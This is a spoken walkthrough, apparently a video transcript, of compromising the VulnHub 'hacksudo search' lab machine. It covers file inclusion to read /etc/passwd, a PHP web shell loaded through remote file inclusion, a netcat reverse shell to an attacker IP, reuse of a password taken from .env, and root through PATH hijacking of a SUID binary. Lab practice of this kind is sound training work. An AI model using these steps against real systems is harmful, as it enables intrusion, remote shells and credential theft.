Yo, what's going on, guys? In this video, we're going to be doing hacksudo search from VulnHub. I rate this box about as super easy, and yeah, I hope you guys enjoy. Alright, so first things first, start by opening our terminal here. I'm gonna just split these. Zoom in. So I'm gonna start a netdiscover -r 10.0.0.1 from a gateway /i ETH0. IP of the box 10.0.0.216. So I'm gonna run an nmap scan here. I'm gonna do nmap -sc for default scripts, -sv for enumeration. Move my keyboard. Alright, so I'm gonna do a netcap -nv on port 80. We do see that port 80 is open for HTTP. So look at this. We do get a search the hacksudo. It seems like it's a useless search engine, right? We do have port 22 for OpenSSH, port 80 for HTTP. So I'm gonna run a GoBuster on the server, dir mode -u HTTP. We'll do -w for user share word list dirbuster. We'll run a directory list 2.3 medium.txt. We'll specify extensions as HTML, TXT, and also PHP. Look at this, we do get a robots.txt, so let's try to visit our robots.txt. It seems like we can add a www.hacksudo.com to our /etc hosts. We do have search 1. Let's try to go search 1. Let's do Control U to view the source code. Doing Control U. I'm looking at down here. It does seem like we do have fuzz, me, about, contact. We could check for a local file inclusion, which seems like this is going to a source, right? So anytime it's going to a source, that means it can either be a local file inclusion or this can be a remote file inclusion, right? So look at this. We're gonna do for each one. We'll do find. We'll do /etc. So we'll do find /etc. Well, equals to /etc password. Doesn't seem like we get anything there. We do have me. Let's lowercase this. And we can put /etc password. And it does seem like that we do get a /etc, right? We can do Control U to view the source code. We can run a bin/bash. Under here, it does seem like we have a user as root, Monel, John, search, hacksudo, and all those users, right? First things first, I like doing is actually going to slash. Since we do know the users, we can copy this, put that under there. I like checking for hacksudo for like the users. I usually like checking the .bash history. So I usually just go to home / hacksudo and then .bash _ history. Look at this. It doesn't seem like we do get anything, right? Just to check if there's any creds in there. So let's try. Let's load up a Python server on our machine. So we'll go under VulnHub. We'll do mkdir for search. We'll cd into search. We'll do python 3 -m http.server on port 80. Looking at this, we're going to see if there's we can test for remote file inclusion. So we'll do http 10.0.0.69. We don't need to specify the port since this is port 80. I'll just make a simple. I'll just touch a file.txt. So we can just do file.txt. Load up our server. Doing this, it does seem like this is getting this is a GET response. So it is vulnerable to remote file inclusion, right? So since this is vulnerable, we can actually load up a PHP reverse shell. There's actually, I'm gonna show you guys 2 ways on how to get a shell in this box. So first things first, we can actually go to we can copy from our var. I think it was user share. I think it was web shells. Yeah, we can go to web shells, and we do have PHP, and we can actually do simple backdoor.php. Let's view the contents out of the simple backdoor. So it is using cmd request, so that means we can execute commands on there, and we can actually execute it by doing the and, right? So right now we do have we can just execute it using CMD, right? Since it is specifying CMD. So I'm gonna start a Python server again. So we'll do Python 3 -m http.server on port 80. We do have simple backdoor.php. So let's try to get this. I did get the GET request, and from here to access it, instead of using so we already have one parameter here. So that's going to be our first parameter for the question mark. And to access the second parameter, you can't really just do question mark. You can't do cmd equals ls. It's not going to work. Since this is our second parameter, you're going to use the and. We do and cmd equals ls. We do get the list of files, right? You can do id for to check the ID, or www data, right? So that's the first way to do it, right? And we can just spawn, we can use wget to spawn our shell, or you can use a one-liner, right? So we'll clear this. We'll do all wrap netcat -lnvp on 4444. We'll spawn a bin bash, so we'll do netcat -e. We'll spawn a /bin bin /bash 10.0.0.69 on 4444. Let's do which netcat. Doesn't seem like we have a netcat and cat probably. We do have Python in here. We can do Python. We have user bin Python. We can get a Python shell, but that's the first way to do it, right? You can just do Python reverse shell one-liner. Let's open burp. Let's turn our proxy on. Open this within burp. So we can go to proxy. Let's go to options. Put this on my specific address. We'll just intercept this. Send this to a repeater. And now we can just type in commands, ID. Looking down here, we just get www data, right? So let's implement our shell under here for Python. So we can Control F for Python. So we'll just copy this. We'll run this in Python 2. We'll do 6.9 and we can do 4444. Send that. Looking at this, does it seem like we get our shell? Let's try to URL encode this. Send that, and we do get our shell, right? So that's the first way to get the shell. So we can just do export term equals xterm, and we are under www, right? So you can do it that way, or if you want to do a simpler way, you can just download a PHP reverse shell. We can get the raw data out of here. But we can just wget this file. We'll wget this. We'll vi into PHP reverse shell. We can delete this. So you can right quit out of this. We'll start the same Python server on here. You can just start up a listener again. And you can just access your PHP reverse shell. Same thing here, you get a shell, right? I'm just gonna do the method I did. That's just a simpler way of doing what I did the first time. You can send that, and we just get a shell, right? So we'll export our term is equal to xterm. Let's try to view our /home directory. We'll go into search ls. It doesn't seem like we can go in there. So let's check out our var www.html. It does seem like we do have a .env, so we can just do cat.env. We'll grab -i for pass. We do get a database password here, so let's just copy this. I'll do ls -la for home. Let's try to switch users to hacksudo. It does seem like that is the password for hacksudo, right? So now we can SSH into hacksudo at 10.0.0.216. We can enter the password. Let's check for any IDs. So we don't have any IDs, so we'll just clear this. We'll go to search. We'll go to admin, see if there's anything in here. We'll go to tools. It seems like we do have a SUID, which is search install. They did use GCC to compile this, so we can cat the search install.c. It seems like we can do some path manipulations for the install. So we'll go to a temp world writable folder. So I'm just going to echo a /bin/bash into install, right? Since it is using this tool. So we can go into install. We'll do chmod +x to install, chmod 777 to install. We'll export our path is equal to /temp %sign path. Clear this. We'll go under home again. Search tools. So now we can echo, if we echo our %sign path, you will see that this is going to /temp, right? So now just to execute it, you can do search -p, and we are root ls, and we can cat a root.txt, right? And there is our root flag, right? So this box is really easy. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.